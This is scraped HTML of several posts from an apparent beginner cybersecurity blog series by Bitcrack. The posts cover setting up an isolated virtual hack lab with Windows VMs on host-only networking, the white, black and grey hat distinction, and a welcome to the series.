<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">1. D</span><span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">ownload the IE8 on Win 7 machine for the VMware Platform from </span><a href="https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/" style="font-family: "Trebuchet MS", sans-serif; text-indent: -0.25in;" target="_blank">here</a><span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">.</span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">2. As for the Win XP machine, Microsoft has ended distribution of test machines. (You can still find lots of XP machines from the internet, ill leave that to you)</span></div>
<div style="text-indent: 0px;">
<a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">3. Extract them both on separate folders and open
them up with your VMware.</span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">4. Allocate 1GB of RAM and change the Network
Adapters to Custom VMNet1 (Host Only) for both of the machines. With HDD space
of at least 30GB for Windows 7 and 15GB for Windows XP.</span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif;">That’s it.</span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif;">Feel free to poke around your brand new attack machine after
the update is completed and you have<span style="background-color: yellow;"> SWITCHED the network adapter to custom
VMNet1 (Host Only)</span>.</span></div>
</div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">On our next article we will start with using the attack
machine to talk to our victim machines. <o:p></o:p></span></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
</div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-74140813402139201432016-09-23T03:25:00.001-07:002016-10-12T02:40:18.743-07:00People in Cyber Security and You<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">Cyber security is one of the fastest growing industries
out there. Thanks to the bad guys ;)</span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">But first! I have to give you a disclaimer before we
go on:-</span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><i>Anything demonstrated on this article series is purely
for educational purposes ONLY. Do not test on live computers over the internet
unless you have an official authorization to do so. We are relying solely on
your good ethics to utilize skills learnt from this series to help make the
cyber space a more secure place. </i><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">Now that we have a thumbs up from our legal team,
let’s move on.</span></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">
The 3 Hats</span></h3>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">You will come across '3 hats' in
cyber security. The White, the black, and the grey. Think of them as the 60’s
movie title “The good, the bad and the ugly”. <o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif; text-indent: -0.25in;"><br /></span></div>
<div class="MsoNoSpacing">
</div>
<ul>
<li><span style="font-family: Trebuchet MS, sans-serif;">White Hats – These are the good people. They
make your anti-virus, they help secure networks in companies, test software to
look for bugs that can be exploited, and so on. All the good things. </span></li>
</ul>
<div class="MsoNoSpacing">
</div>
<ul>
<li><span style="font-family: Trebuchet MS, sans-serif;">Black Hats – These people are the not so good
people. They target whoever they like then spend countless hours to look for
security weakness and exploit them to hack into networks for malicious intent and profit.</span></li>
</ul>
<div class="MsoListParagraph">
</div>
<ul>
<li><span style="font-family: Trebuchet MS, sans-serif;">Grey Hat – Think of them as the hybrids. They
are the people who have good ethics like the white hats and sometimes break the rules but don’t
have dangerous intent as black hats. These are basically the cool guys who know how to bend rules, without breaking the laws. </span></li>
</ul>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="MsoNoSpacing" style="margin-left: .5in; mso-list: l1 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Trebuchet MS, sans-serif;"><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">All three types of people are continuously honing their
skills to outsmart the other. The black hats tirelessly look for weaknesses in
software and networks to hack into while the white hats constantly develop
patches, best policies and practices to prevent black hats from exploiting
weaknesses.<o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">Being part of the cyber security industry, there are new
threats every day and new techniques on how to prevent and stop those threats.
The key is to constantly practice, practice, practice and read, read, read. <o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">
So what do you need to be a security expert?</span></h3>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">Let’s get one thing straight. There is no 100% expert in all aspects of cyber
security. Nada. Naught. None. You simply cannot be an “expert” in a field that is ever-growing and evolving immensely. But what you can be is one of the best out there. Below are a fundamental skills that every pro hacker needs;</span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif; text-indent: -0.25in;"><br /></span></div>
<div class="MsoNoSpacing">
</div>
<ol>
<li><span style="font-family: Trebuchet MS, sans-serif;">A very good understanding of different types of
operating systems.</span></li>
<li><span style="font-family: Trebuchet MS, sans-serif;">A good understanding of networking and its
concepts.</span></li>
<li><span style="font-family: Trebuchet MS, sans-serif;">Have good programming skills.</span></li>
<li><span style="font-family: Trebuchet MS, sans-serif;">And the most crucial of them all, have a mind
curious enough to want to break things and see what’s going on behind the
curtains.</span></li>
</ol>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">If you feel you are weak in any or all of the first
three, fear not, for you shall only need the curiosity to get better at them. <o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: Trebuchet MS, sans-serif;">It’s about time we go hands-on. Stay tuned for our next
article where we will help you on create your own hack lab in which you can safely put the theories to test. <o:p></o:p></span></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<i style="background-color: white; color: #333333;"><span style="font-family: Trebuchet MS, sans-serif;">-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</span></i></div>
<div class="MsoNormal">
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<i style="background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px;"><br /></i></div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-70813136142511429202016-09-23T02:49:00.002-07:002016-09-23T13:02:51.487-07:00Bitcrack’s Educational Series Blog!<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h2>
<span style="font-family: "trebuchet ms" , sans-serif;">Greetings!</span></h2>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Do you want to get started into cyber security? <o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Are you passionate about cyber security and want to try
things out?<o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Are you tired of seeing cyber security articles without
no practical guidance?<o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Would you like to know and try out new security tools?<o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Then you have just stumbled upon the right resource. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><b>Welcome to Bitcrack’s Educational Series Blog!</b></span></h3>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Here at Bitcrack Cyber Security, we believe basic knowledge should be
freely accessible to all. In these series we will help you with the very basics
of Cyber Security with hands-on guides from the very beginning of creating your
own virtual hack lab to using popular penetration testing methodologies all the
way to reverse engineering and exploit development. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">NOTE – This
educational series is not meant for experts. For technical articles please go to: <a href="http://blog.bitcrack.net/" target="_blank">blog.bitcrack.net</a><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">So let’s get right to it.</span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<o:p><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></o:p></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Oh, and if you want more info such as a specific guide, can’t get a tool working or anything to do with IT and cyber security,<o:p></o:p></span></div>
<div class="MsoNoSpacing" style="text-indent: .5in;">
<span style="font-family: "trebuchet ms" , sans-serif;">send us a tweet at:<o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"> <a href="https://twitter.com/bitcrack_cyber" target="_blank">@bitcrack_cyber</a>
| <a href="https://twitter.com/secjay" target="_blank">@secjay</a> | <a href="https://twitter.com/RuraPenthe0" target="_blank">@RuraPenthe0</a><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">..because emails are too boring and who has time for forms! :-)<o:p></o:p></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><b>PS - We also do corporate-based security training should you or your company want to get really in-depth into hacking in a class setting.</b></span></div>
</div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<span style="font-size: 11pt; line-height: 107%;"><span style="font-family: "trebuchet ms" , sans-serif;">Finally, follow our <a href="https://www.linkedin.com/company/bitcrack-cyber-security" target="_blank">Linkedin page</a> at for the latest security trends and news </span></span>Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0